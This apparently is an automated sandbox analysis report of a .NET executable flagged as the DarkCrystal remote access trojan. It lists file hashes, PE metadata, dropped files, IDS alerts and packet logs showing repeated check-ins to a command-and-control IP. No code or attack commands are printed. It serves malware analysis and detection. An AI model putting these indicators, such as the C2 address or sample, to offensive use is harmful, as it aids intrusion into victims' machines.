Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

C:\Windows\system32\wbem\Performance\WmiApRpl.ini (copy)

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
Category:	dropped
Size (bytes):	48786
Entropy (8bit):	3.5854495362228453
Encrypted:	false
SSDEEP:	384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
MD5:	DF877BEC5C9E3382E94FEA48FEE049AC
SHA1:	1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
SHA-256:	7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
SHA-512:	433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
Malicious:	false
Preview:	.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.820369091647348
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXlgFBOOcKyaNvrPWdILjNvj:Vx993DEUamG9WLN
MD5:	AB8364DD5C6D2C457042A0400F0A03A1
SHA1:	6FD8BA63DE2FC68316894C648DB3B44ACC5C2CD4
SHA-256:	76C5A91A8FBEAF3830DA85CE6FF0598C4DEAF4A4E034337BEF9689F1B37DC926
SHA-512:	86287B9931E94F8F32FEA5337D6A33A52AE320A965B2B14FC73923CAE4D9FD155A125E32F3B15E411ADC5398ED3B280B0789F42FE34FAD5812B2A3BC15D2597F
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 26/10/2024 22:38:09..22:38:09, error: 0x80072746.22:38:14, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.803162366843507
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	9D7RwuJrth.exe
File size:	3'408'384 bytes
MD5:	0ad0b4a4a549230e090d712b5521bd96
SHA1:	55690e0d976955e80f14c314efcaa34e3303a02b
SHA256:	9882ee185d8d4db2a86040b7e3c7687cef737470f2a7b5c88868e80880cbd429
SHA512:	b689ab2b7e3a59f760d3c6cb3b72927e3dc0eb9323aceb05c2571ca85863fc769098924b943e6e80edb1853c348451869996fd4c38a7dd10dc8e2970e5d4d027
SSDEEP:	49152:dvE7aj/zSltwCUFFINtKAh/tIBs2htYmMoxqSeU843FULbiGLSkGHuIB6MlwALMV:9FzPFFIv7h/KVWYxVeE+i1FOIB6Mmkw
TLSH:	C5F5F15A55A24E3BC2641B318467003E52A1E77A3972EB4A3A1F10D1B803BF5DF761FB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J..g..................3.........N.4.. ... 4...@.. .......................`4...........@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x74194e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x670BCF4A [Sun Oct 13 13:46:50 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x341900	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x342000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x344000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x33f954	0x33fa00	beba6b5b3eaa2aac64c8b94e386ebb73	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x342000	0x320	0x400	3d86b273c33132617c868a49bfe83c9d	False	0.3515625	data	2.647513053806798	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x344000	0xc	0x200	0aa914259ec164eb926149e4cee57423	False	0.044921875	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "4"	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x342058	0x2c8	data			0.46207865168539325

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-27T02:42:16.030508+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49730	188.114.96.3	80	TCP
2024-10-27T02:42:29.093066+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49737	188.114.96.3	80	TCP
2024-10-27T02:42:39.054409+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49738	188.114.96.3	80	TCP
2024-10-27T02:42:48.151061+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49739	188.114.96.3	80	TCP
2024-10-27T02:43:01.209944+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49752	188.114.96.3	80	TCP
2024-10-27T02:43:11.310891+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49807	188.114.96.3	80	TCP
2024-10-27T02:43:24.686845+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49883	188.114.96.3	80	TCP
2024-10-27T02:43:37.764984+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49958	188.114.96.3	80	TCP
2024-10-27T02:43:48.264991+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50010	188.114.96.3	80	TCP
2024-10-27T02:44:00.765036+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50011	188.114.96.3	80	TCP
2024-10-27T02:44:10.171275+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50012	188.114.96.3	80	TCP
2024-10-27T02:44:17.936902+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50013	188.114.96.3	80	TCP
2024-10-27T02:44:41.895591+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50015	188.114.96.3	80	TCP
2024-10-27T02:44:54.124469+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50016	188.114.96.3	80	TCP
2024-10-27T02:45:01.921365+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50017	188.114.96.3	80	TCP
2024-10-27T02:45:14.187101+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50018	188.114.96.3	80	TCP
2024-10-27T02:45:22.249536+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50019	188.114.96.3	80	TCP
2024-10-27T02:45:34.484041+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50020	188.114.96.3	80	TCP
2024-10-27T02:45:42.218300+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50021	188.114.96.3	80	TCP
2024-10-27T02:45:54.452699+0200	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50022	188.114.96.3	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 02:42:15.352031946 CEST	49730	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:15.357486010 CEST	80	49730	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:15.357587099 CEST	49730	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:15.358254910 CEST	49730	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:15.363616943 CEST	80	49730	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:15.703035116 CEST	49730	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:15.708544970 CEST	80	49730	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:15.976058960 CEST	80	49730	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:16.030508041 CEST	49730	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:16.313039064 CEST	80	49730	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:16.313096046 CEST	80	49730	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:16.313127041 CEST	80	49730	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:16.313194036 CEST	49730	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:16.358634949 CEST	49730	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:16.524852037 CEST	49730	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:28.447776079 CEST	49737	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:28.453495026 CEST	80	49737	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:28.453592062 CEST	49737	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:28.453943014 CEST	49737	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:28.459372044 CEST	80	49737	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:28.812484026 CEST	49737	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:28.818077087 CEST	80	49737	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:29.050370932 CEST	80	49737	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:29.093065977 CEST	49737	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:29.375179052 CEST	80	49737	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:29.375233889 CEST	80	49737	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:29.375343084 CEST	49737	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:29.750330925 CEST	49737	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:38.288445950 CEST	49738	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:38.294102907 CEST	80	49738	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:38.294183969 CEST	49738	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:38.294428110 CEST	49738	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:38.299803019 CEST	80	49738	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:38.640119076 CEST	49738	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:38.645562887 CEST	80	49738	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:38.913938046 CEST	80	49738	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:39.054409027 CEST	49738	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:39.229060888 CEST	80	49738	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:39.229099035 CEST	80	49738	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:39.229368925 CEST	49738	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:39.451637983 CEST	49738	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:47.333853960 CEST	49739	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:47.339659929 CEST	80	49739	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:47.339863062 CEST	49739	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:47.340200901 CEST	49739	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:47.345705032 CEST	80	49739	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:47.687000036 CEST	49739	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:47.692893028 CEST	80	49739	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:47.942156076 CEST	80	49739	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:48.150974989 CEST	80	49739	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:48.151061058 CEST	49739	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:48.376422882 CEST	80	49739	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:48.376476049 CEST	80	49739	188.114.96.3	192.168.2.4
Oct 27, 2024 02:42:48.376758099 CEST	49739	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:42:48.704054117 CEST	49739	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:00.574029922 CEST	49752	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:00.579588890 CEST	80	49752	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:00.580468893 CEST	49752	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:00.580704927 CEST	49752	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:00.586085081 CEST	80	49752	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:00.937201023 CEST	49752	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:00.943038940 CEST	80	49752	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:01.169492960 CEST	80	49752	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:01.209944010 CEST	49752	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:01.479398012 CEST	80	49752	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:01.479444027 CEST	80	49752	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:01.479521990 CEST	49752	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:01.815128088 CEST	49752	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:10.489445925 CEST	49807	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:10.495100021 CEST	80	49807	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:10.495219946 CEST	49807	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:10.495507956 CEST	49807	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:10.500837088 CEST	80	49807	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:10.843298912 CEST	49807	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:10.848824024 CEST	80	49807	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:11.099488020 CEST	80	49807	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:11.310797930 CEST	80	49807	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:11.310890913 CEST	49807	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:11.411142111 CEST	80	49807	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:11.411185026 CEST	80	49807	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:11.411262989 CEST	49807	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:11.741316080 CEST	49807	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:24.036644936 CEST	49883	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:24.042244911 CEST	80	49883	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:24.044600964 CEST	49883	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:24.045061111 CEST	49883	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:24.050404072 CEST	80	49883	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:24.390295982 CEST	49883	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:24.395596981 CEST	80	49883	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:24.644598007 CEST	80	49883	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:24.686845064 CEST	49883	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:24.971951008 CEST	80	49883	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:24.971995115 CEST	80	49883	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:24.972203016 CEST	49883	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:25.255120039 CEST	49883	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:37.099160910 CEST	49958	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:37.105971098 CEST	80	49958	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:37.106053114 CEST	49958	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:37.106426001 CEST	49958	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:37.114792109 CEST	80	49958	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:37.453020096 CEST	49958	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:37.458533049 CEST	80	49958	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:37.709683895 CEST	80	49958	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:37.764983892 CEST	49958	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:38.035645962 CEST	80	49958	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:38.035754919 CEST	80	49958	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:38.035813093 CEST	49958	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:38.709157944 CEST	49958	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:47.464536905 CEST	50010	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:47.469942093 CEST	80	50010	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:47.470027924 CEST	50010	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:47.470383883 CEST	50010	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:47.475642920 CEST	80	50010	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:47.827831030 CEST	50010	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:47.833225965 CEST	80	50010	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:48.066690922 CEST	80	50010	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:48.264991045 CEST	50010	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:48.271105051 CEST	80	50010	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:48.271131039 CEST	80	50010	188.114.96.3	192.168.2.4
Oct 27, 2024 02:43:48.271306992 CEST	50010	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:43:48.584566116 CEST	50010	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:00.062097073 CEST	50011	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:00.067559004 CEST	80	50011	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:00.067842007 CEST	50011	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:00.067842960 CEST	50011	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:00.073344946 CEST	80	50011	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:00.421704054 CEST	50011	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:00.427256107 CEST	80	50011	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:00.671709061 CEST	80	50011	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:00.765036106 CEST	50011	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:00.993123055 CEST	80	50011	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:00.993226051 CEST	80	50011	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:00.993241072 CEST	80	50011	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:00.993413925 CEST	50011	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:01.070152044 CEST	50011	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:01.147593021 CEST	50011	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:09.504355907 CEST	50012	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:09.510065079 CEST	80	50012	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:09.510262966 CEST	50012	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:09.510418892 CEST	50012	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:09.515698910 CEST	80	50012	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:09.858977079 CEST	50012	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:09.864546061 CEST	80	50012	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:10.115657091 CEST	80	50012	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:10.171274900 CEST	50012	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:10.436002016 CEST	80	50012	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:10.436017036 CEST	80	50012	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:10.436187983 CEST	50012	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:10.548325062 CEST	50012	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:17.283691883 CEST	50013	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:17.289382935 CEST	80	50013	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:17.289650917 CEST	50013	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:17.289716005 CEST	50013	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:17.295218945 CEST	80	50013	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:17.640363932 CEST	50013	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:17.646044970 CEST	80	50013	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:17.894025087 CEST	80	50013	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:17.936902046 CEST	50013	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:18.212285995 CEST	80	50013	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:18.212320089 CEST	80	50013	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:18.212382078 CEST	50013	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:18.286057949 CEST	50013	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:29.123050928 CEST	50014	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:29.128516912 CEST	80	50014	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:29.128618002 CEST	50014	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:29.128803968 CEST	50014	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:29.134130955 CEST	80	50014	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:29.484226942 CEST	50014	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:29.490386963 CEST	80	50014	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:29.726347923 CEST	80	50014	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:29.780719995 CEST	50014	80	192.168.2.4	188.114.96.3
Oct 27, 2024 02:44:30.063210011 CEST	80	50014	188.114.96.3	192.168.2.4
Oct 27, 2024 02:44:30.063222885 CEST	80	50014	188.114.96.3	192.168.2.4
